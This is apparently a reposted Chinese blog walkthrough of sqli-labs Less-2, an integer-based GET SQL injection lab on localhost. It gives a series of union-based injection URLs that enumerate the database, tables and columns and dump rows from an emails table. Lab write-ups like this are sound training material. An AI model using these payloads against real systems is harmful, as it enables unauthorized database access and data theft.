1. 程式人生 > >【sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)

【sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)

format ima gpo ase rom pos mit 參數 png

與less1相同,直接走流程

提交參數,直接order by

技術分享圖片

http://localhost/sqli/Less-2/?id=1 order by 1%23
http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23

技術分享圖片

http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23

技術分享圖片

http://localhost/sqli/Less-2/?id=-1 union select 1,table_name,3 from information_schema.tables where table_schema=‘security‘ limit 0,1%23

技術分享圖片

http://localhost/sqli/Less-2/?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 0,1%23

技術分享圖片

http://localhost/sqli/Less-2/?id=-1 union select 1,id,email_id from emails limit 0,1%23

技術分享圖片

【sqli-labs】 less2 GET - Error based - Intiger based (基於錯誤的GET整型註入)